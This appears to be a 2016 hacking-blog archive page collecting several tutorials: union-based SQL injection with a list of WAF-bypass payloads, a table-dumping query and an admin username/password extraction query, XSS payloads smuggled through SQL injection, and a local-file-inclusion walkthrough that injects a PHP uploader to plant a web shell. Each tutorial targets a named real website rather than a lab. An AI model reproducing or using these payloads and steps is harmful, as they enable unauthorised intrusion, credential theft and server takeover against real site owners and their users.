Learn To hack : June 2016

Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades

After Our Tutorial on Basics Of SQL Injection.
Union based SQL injection + WAF Bypassing By Adesh

Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'

And Get MYSQL Error.
Lets Balance Our Query for Further Injecting.
--

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here Is A Small Explanation on Balance and Comment in our Injection.

After Balancing Our Query . Next is Count Total Number Of Columns
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No Error !
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No Error!

http://radiozhakkasmarathi.in/full_review.php?id=3' order by 6-- -
Again No Error !

http://radiozhakkasmarathi.in/full_review.php?id=3' order by 7-- -
Here We Get Error !
Error 2

Now Try To Find Our Vulnerable Columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3' union select 1,2,3,4,5,6-- -

If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.
/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
Just Change The Union Select With Following Bypass URLs.

Lets Continue Our Tutorial.
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

and
**************For Our Target We use
/*!50000union */ and concat/*!50000()*/

http://radiozhakkasmarathi.in/full_review.php?id=-3' /*!50000union */ select 1,2,3,4,5,6-- -

We Will Get Our Vulnerable Columns Printed On The Page.2 is Our Vulnerable Column.

Here Are Some Variables Of MYSQL.
@@version = Current Version
@@GLOBAL.VERSION = Current Version
User() = Current User
Database = Current Database

for Version :http://radiozhakkasmarathi.in/full_review.php?id=-3' /*!50000union */ select 1,@@version ,3,4,5,6-- -

We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.
we DIOS it

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Lets Execute our DIOS Query

We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then write Query
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -

For Video TUtorial

Enjoy :]

Tutorial By Adesh kolte

https://www.facebook.com/kolteAdesh

xss via SqL injection part 2 tutorial

Manipulating SQL Injection Queries in XSS Payload

If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example,

Our XSS Payload for Showing Version in a POP-Up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.

Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e

),4,5,6,7,8,9--+
Let's Execute our Payload:

and here we got the Current Version in a XSS Pop-up.We can Do the Same For the Current Database and user.
After POP-UP the Version next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.

(select group_concat(table_name) from information_schema.tables where table_Schema=database())

Let's Add this DIOS Query in our XSS Payload .

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

Now execute this Query and Check the output Response

We got the Tables from the current Database . But if we go on Further and add HTML TAGS for Starting each Table in a New Line like <BR>.But Here This HTML Doesn't Work.
In XSS we use " \n " which is used for showing each result in a new Line.So will add This Part to Our DIOS Query to show All Tables in a New Line in our XSS Pop-Up.

We Need to First Encode it in Hex Value and then Insert into DIOS Query.

HEX Value: \n :0x5c6e
\n converted into hex 0x5c6e

Let's Add it in our XSS Payload :

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

And Here we can see all tables are starting from a New line in XSS Pop-up Alert Box.We can do the Same For Columns by adding that Part in our DIOS Query.I Leave That part for You Guys.

Enjoy :]

Xss using Sql injection Tutorial 1

Tn this Tutorial you will learn XSS Attack via SQL Injection.
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".
In XSS Attack via SQL Injection we will Execute our XSS payloads in UNION BASEDquery.

For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site

http://www.lokmat.com/storypage.php?catid=31&newsid=3448

After Counting the Columns there are 9 Total Number of Columns.So let's ready up our Union Based Query and execute it .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+

There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column
Here is the our XSS Payload that we are going to inject into the UNION BASED Query,

XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this Payload we need to Encode it in HEX Value (use hackbar)

HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output

This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload
Enjoy
This is the basic XSS Payload ,you can try more Payloads which will posted in the next tutoria

XSS Cheat Sheet:

This vulnerability occurs due to Poor Developing application of the code.A Attacker able to inject his malicious HTML code through client web browsers.
Mostly The Whole XSS Attack is based on Javascript and HTML for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .
XSS can be used for Phishing as well as Stealing Accounts or we can do some Social Engineering with XSS.
XSS Cheat Sheet:

shell upoading Using LFI by Mr.Cyb3rWarrior (ADesh kolte)

Today I Shown how To Hack A Website using LFI:- Please Do Not Deafce This

Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php

Step:2 Now Remove All Text After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=

Step:3 Put The Back_slash After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=/

If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80% If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%

Here Is got Error on Website After Put (/)

Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9

Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9

Step:4 Put This Code After The (./?content=) /proc/self/environ Now Url Look Like This:-

http://www.clginstitute.org/?content=/proc/self/environ

You Seen After Put /proc/self/environ Its Seen Some Seesion Request On Website, That Mins We Are Able To Upload Our Shell.

Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-

Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.

And Submit The Request.

Uploader Code:-

<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>

Step:7 Now You Seen Our Uplader in The Website, Here Upload Your shell And Submit Your Request in Tamper Data.

Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.

Step:9 Your Shell Got Uploaded On the Server Check It Now.

Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.

And Also Post Your Webhacking tutorials in Fourm.

BY Mr.Cyb3rWarrior (Adesh kolte)